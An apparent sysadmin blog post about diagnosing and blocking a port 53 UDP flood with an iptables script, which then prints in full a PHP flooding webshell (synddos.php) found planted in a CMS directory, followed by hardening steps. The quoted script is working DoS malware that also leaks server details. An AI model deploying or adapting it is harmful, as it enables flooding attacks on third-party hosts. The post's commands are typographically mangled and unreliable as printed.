Home > Networking Security, Security > resolved – port 53 dns flooding attack

resolved – port 53 dns flooding attack

April 13th, 2012


I found this port 53 dns flooding attack when the server became very unsteady. NIC was blipping and networking just went down without OS rebooting.

Using ntop as detector, I found the issue with DNS traffic was at a very high level(about 3Gb traffic). Then I determined to forbid DNS traffic, and only allow some usual ports.

  • stop iptables and disable autoboot of iptables
/etc/init.d/iptables stop
mv /etc/rc3.d/S08iptables /etc/rc3.d/s08iptables
  • here’s the rules

[root@doxer ~]# cat iptables-stop-flood.sh

#!/bin/bash
iptables -F

#Note that DROP is different than REJECT. REJECT will return error to client(telnet will return Connection refused from client), but DROP will just drop the packet(telnet will hang Trying and return Connection timed out).
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#todo – allow no more than 5 new connections per second
#iptables -A INPUT -p tcp –syn -m limit –limit 5/s -i eth0 -j ACCEPT

# Allow traffic already established to continue
iptables -A INPUT -p all -m state –state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p all -m state –state INVALID -j DROP

#Allow ftp, http, mysql
#todo – if there’s no -m, than –dport or –sport must be in a range
#todo – –ports source and destination ports are assumed to be the same
iptables -A INPUT -p tcp -m multiport –dport 20,21,80,3306 -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport –sport 20,21,80,3000,3306 -j ACCEPT

#Allow outgoing httpd like telnet doxer 80
iptables -A OUTPUT -p tcp –dport 80 -j ACCEPT

#Allow ntop
iptables -A INPUT -p udp -m multiport –dport 3000 -j ACCEPT
iptables -A INPUT -p tcp -m multiport –dport 3000 -j ACCEPT

#Allow sftp
iptables -A INPUT -p tcp –dport 115 -j ACCEPT
iptables -A OUTPUT -p tcp –sport 115 -j ACCEPT

#Allow outgoing ssh
iptables -A INPUT -p tcp –dport 22 -j ACCEPT
iptables -A INPUT -p tcp –sport 22 -j ACCEPT
iptables -A OUTPUT -p tcp –dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp –sport 22 -j ACCEPT

#allow rsync
iptables -A OUTPUT -p tcp –dport 873 -j ACCEPT
iptables -A OUTPUT -p tcp –sport 873 -j ACCEPT
iptables -A INPUT -p tcp –sport 873 -j ACCEPT
iptables -A INPUT -p tcp –dport 873 -j ACCEPT

#allow ftp passive mode(you need set vsftpd first)
iptables -A INPUT -p tcp –sport 21 -m state –state ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp –sport 20 -m state –state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp –dport 35000:37000 -j ACCEPT
iptables -A OUTPUT -p tcp –sport 35000:37000 -j ACCEPT

#Allow ping & nslookup. reply is 8, request is 0
#allow other hosts to ping
iptables -A INPUT -p icmp –icmp-type 8 -m limit –limit 1/s -j ACCEPT
#iptables -A INPUT -p icmp –icmp-type 8 -j ACCEPT
iptables -A OUTPUT -p icmp –icmp-type 0 -j ACCEPT
#allow this host ping others
iptables -A INPUT -p icmp –icmp-type 0 -j ACCEPT
iptables -A OUTPUT -p icmp –icmp-type 8 -j ACCEPT

#allow dns query
#iptables -A OUTPUT -p udp –dport 53 -m state –state NEW,ESTABLISHED -j ACCEPT
#iptables -A INPUT -p udp –sport 53 -m state –state ESTABLISHED -j ACCEPT
#iptables -A OUTPUT -p tcp –dport 53 -m state –state NEW,ESTABLISHED -j ACCEPT
#iptables -A INPUT -p tcp –sport 53 -m state –state ESTABLISHED -j ACCEPT

# Allow local loopback services
iptables -A INPUT -i lo -j ACCEPT

#save and restart iptables
/etc/init.d/iptables save
/etc/init.d/iptables restart

  • run the rules

chmod +x ./iptables-stop-flood.sh && ./iptables-stop-flood.sh

  • enable autoboot of iptables
If everything is ok, enable autoboot of iptables:
mv /etc/rc3.d/s08iptables /etc/rc3.d/S08iptables

After all these steps, dns traffic now dropped to normal status.

NB:

After several days’ investigation, I finally found out that this attack was source from some worms(php worms?) embedded in dedecms’s directory. Here’s one file called synddos.php:

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_REQUEST['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"].”|”.GetHostByName($_SERVER['SERVER_NAME']).”|”.php_uname().”|”.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo “Warning to: opening”;
exit;
}

for($i=0;$i<$Sendlen;$i++){
$out .= “A”;
}

$max_time = time()+$exec_time;

while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(“udp://$host”, $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

echo “Send Host:$host:$port<br><br>”;
echo “Send Flow:$packets * ($Sendlen/1024=” . round($Sendlen/1024, 2) . “)kb / 1024 = ” . round($packets*$Sendlen/1024/1024, 2) . ” mb<br><br>”;
echo “Send Rate:” . round($packets/$exec_time, 2) . ” packs/s;” . round($packets/$exec_time*$Sendlen/1024/1024, 2) . ” mb/s”;
?>

This is crazy! That explains the reason why there was so much DNS traffic out!

To cure this weakness:

1.disable fsockopen function in php.ini

disable_functions = fsockopen

2.in .htaccess file, limit php scripts from running

RewriteEngine on
RewriteCond % !^$
RewriteRule uploads/(.*).(php)$ – [F]
RewriteRule data/(.*).(php)$ – [F]
RewriteRule templets/(.*).(php)$ – [F]


support_me
Amounts
  1. No comments yet.
  1. No trackbacks yet.